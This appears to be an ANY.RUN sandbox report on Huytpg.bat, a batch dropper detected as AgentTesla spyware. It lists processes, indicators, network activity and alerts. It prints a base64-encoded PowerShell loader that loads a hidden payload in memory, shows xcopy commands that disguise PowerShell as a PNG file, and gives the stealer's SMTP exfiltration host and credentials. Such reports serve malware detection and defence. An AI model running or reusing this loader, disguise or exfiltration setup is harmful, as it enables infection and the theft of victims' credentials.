File name:

Huytpg.bat

Full analysis: https://app.any.run/tasks/3a40c518-f407-4c8c-a341-4827a47ac498
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 23:30:59
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
ultravnc
rmm-tool
evasion
exfiltration
smtp
agenttesla
susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (59698), with CRLF line terminators
MD5:

52ABAF31262B4E9F4C529CED77BC633F

SHA1:

2B9F4E761C6E03B13E9DFE2597170936A68685D7

SHA256:

2A9FE3F93E0423EE4691D7D3E27F2F108B932703F4E18E322B16487CEDCC8BEF

SSDEEP:

24576:arDybU5x2+4vancoSw61PTWZXE7qJzBVFD8vcBhWnwydSlR:Qp4i7SdJWZXnO8hsw3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Xcopy is used to copy an executable file into an image

      • xcopy.exe (PID: 6036)
      • xcopy.exe (PID: 668)

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 4448)
      • cmd.exe (PID: 5800)

    • Dynamically loads an assembly (POWERSHELL)

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Changes the autorun value in the registry

      • Iexjumv.png (PID: 5204)

    • Steals credentials from Web Browsers

      • Iexjumv.png (PID: 5204)

    • Actions looks like stealing of personal data

      • Iexjumv.png (PID: 5204)

    • AGENTTESLA has been detected (SURICATA)

      • Iexjumv.png (PID: 5204)

    • AGENTTESLA has been detected (YARA)

      • Iexjumv.png (PID: 5204)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4448)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 4652)
      • Iexjumv.png (PID: 3020)
      • cmd.exe (PID: 920)
      • cmd.exe (PID: 5800)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 2152)
      • Iexjumv.png (PID: 3020)
      • cmd.exe (PID: 4652)
      • cmd.exe (PID: 920)

    • Application launched itself

      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 4448)
      • cmd.exe (PID: 4652)
      • cmd.exe (PID: 920)
      • cmd.exe (PID: 5800)

    • Process copies executable file

      • cmd.exe (PID: 4448)
      • cmd.exe (PID: 5800)

    • Executable content was dropped or overwritten

      • xcopy.exe (PID: 6036)

    • The executable file from the user directory is run by the CMD process

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Starts application with an unusual extension

      • cmd.exe (PID: 4448)
      • cmd.exe (PID: 5800)

    • Starts a Microsoft application from unusual location

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Renamed powershell base64 command

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Uses base64 encoding (POWERSHELL)

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Uses sleep to delay execution (POWERSHELL)

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Reverses array data (POWERSHELL)

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Reads the date of Windows installation

      • Iexjumv.png (PID: 3020)

    • Reads security settings of Internet Explorer

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • Iexjumv.png (PID: 5204)

    • Connects to SMTP port

      • Iexjumv.png (PID: 5204)

    • The process connected to a server suspected of theft

      • Iexjumv.png (PID: 5204)

  • INFO

    • Create files in a temporary directory

      • xcopy.exe (PID: 6036)
      • xcopy.exe (PID: 7052)
      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • The sample compiled with english language support

      • xcopy.exe (PID: 6036)

    • Process checks Powershell version

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Reads the computer name

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Reads the software policy settings

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)
      • slui.exe (PID: 1628)
      • slui.exe (PID: 6476)

    • Reads the machine GUID from the registry

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Reads Environment values

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Process checks computer location settings

      • Iexjumv.png (PID: 3020)

    • Checks supported languages

      • Iexjumv.png (PID: 3020)
      • Iexjumv.png (PID: 5204)

    • Creates files or folders in the user directory

      • Iexjumv.png (PID: 5204)

    • Checks proxy server information

      • Iexjumv.png (PID: 5204)
      • slui.exe (PID: 6476)

    • Disables trace logs

      • Iexjumv.png (PID: 5204)

    • ULTRAVNC has been detected

      • Iexjumv.png (PID: 5204)

    • Found Base64 encoded access to processes via PowerShell (YARA)

      • Iexjumv.png (PID: 5204)
      • cmd.exe (PID: 5800)

    • Found Base64 encoded file access via PowerShell (YARA)

      • Iexjumv.png (PID: 5204)
      • cmd.exe (PID: 5800)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • Iexjumv.png (PID: 5204)
      • cmd.exe (PID: 5800)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • Iexjumv.png (PID: 5204)
      • cmd.exe (PID: 5800)

    • Found Base64 encoded compression PowerShell classes (YARA)

      • Iexjumv.png (PID: 5204)
      • cmd.exe (PID: 5800)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(5204) Iexjumv.png
Protocolsmtp
Hostmail.wecaresvc.com
Port587
Usernameedward.chen@wecaresvc.com
Passwordu9367gk8qc
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
24
Malicious processes
8
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs xcopy.exe cmd.exe no specs xcopy.exe no specs iexjumv.png no specs sppextcomobj.exe no specs slui.exe cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs xcopy.exe no specs cmd.exe no specs xcopy.exe no specs #AGENTTESLA iexjumv.png slui.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
668xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\admin\AppData\Local\Temp\Iexjumv.pngC:\Windows\System32\xcopy.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Extended Copy Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\xcopy.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\ifsutil.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\devobj.dll
900\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Iexjumv.png.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1188\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1628"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2140C:\WINDOWS\system32\cmd.exe /S /D /c" echo F "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2152C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\Huytpg.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3020C:\Users\admin\AppData\Local\Temp\Iexjumv.png -win 1 -enc JABCAGIAYgB0AHkAdwB1AHMAcgBqACAAPQAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEwAaQBuAGUAcwAoACgAKABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAC4AYgBhAHQAIgApACwAIABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAGwAYQBzAHQAIAAxADsAIAAkAEIAaABxAGcAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABCAGIAYgB0AHkAdwB1AHMAcgBqACkAOwAkAFgAZAB3AGYAbAB3AHAAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEIAaABxAGcAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABSAHMAbwBzAHkAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABYAGQAdwBmAGwAdwBwACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABSAHMAbwBzAHkAaQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAUgBzAG8AcwB5AGkALgBDAGwAbwBzAGUAKAApADsAJABYAGQAdwBmAGwAdwBwAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAQgBoAHEAZwBzACAAPQAgACQAbwB1AHQAcAB1AHQALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEIAaABxAGcAcwApADsAIAAkAFIAbQBuAHMAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAEIAaABxAGcAcwApADsAIAAkAEcAaABnAHUAcAAgAD0AIAAkAFIAbQBuAHMAZwBxAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQATwBzAGcAZAByACAAPQAgACQARwBoAGcAdQBwAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==C:\Users\admin\AppData\Local\Temp\Iexjumv.pngcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\iexjumv.png
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3020C:\WINDOWS\system32\cmd.exe /S /D /c" echo F "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
Total events
11 129
Read events
11 113
Write events
16
Delete events
0

Modification events

(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5204) Iexjumv.pngKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Iexjumv_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
1
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
3020Iexjumv.pngC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhe1vmwv.loa.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5204Iexjumv.pngC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_423ezvtr.rq0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5204Iexjumv.pngC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4rvku0cc.ieh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3020Iexjumv.pngC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hmtxudsg.zqq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6036xcopy.exeC:\Users\admin\AppData\Local\Temp\Iexjumv.pngexecutable
MD5:2E5A8590CF6848968FC23DE3FA1E25F1
SHA256:9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3
3020Iexjumv.pngC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:716D5020BDF74C72F9AD3CB6E0DA0201
SHA256:832A8DE677B7419438592372D9FEC75AF0AF518D93D4A2D17E89B56FAFA1B841
5204Iexjumv.pngC:\Users\admin\AppData\Roaming\Microsoft\Iexjumv.battext
MD5:52ABAF31262B4E9F4C529CED77BC633F
SHA256:2A9FE3F93E0423EE4691D7D3E27F2F108B932703F4E18E322B16487CEDCC8BEF
7052xcopy.exeC:\Users\admin\AppData\Local\Temp\Iexjumv.png.battext
MD5:52ABAF31262B4E9F4C529CED77BC633F
SHA256:2A9FE3F93E0423EE4691D7D3E27F2F108B932703F4E18E322B16487CEDCC8BEF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
29
DNS requests
20
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.36:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6132
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6132
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
23.216.77.36:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.32.138:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2112
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.216.77.36
  • 23.216.77.28
  • 23.216.77.42
  • 23.216.77.20
whitelisted
google.com
  • 216.58.206.78
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
login.live.com
  • 40.126.32.138
  • 40.126.32.76
  • 20.190.160.67
  • 20.190.160.128
  • 40.126.32.133
  • 20.190.160.4
  • 20.190.160.131
  • 20.190.160.20
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
api.ipify.org
  • 172.67.74.152
  • 104.26.13.205
  • 104.26.12.205
shared
mail.wecaresvc.com
  • 103.144.32.18
malicious
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
5204
Iexjumv.png
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
5204
Iexjumv.png
Successful Credential Theft Detected
STEALER [ANY.RUN] Exfiltration via SMTP (AgentTesla)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Huytpg.bat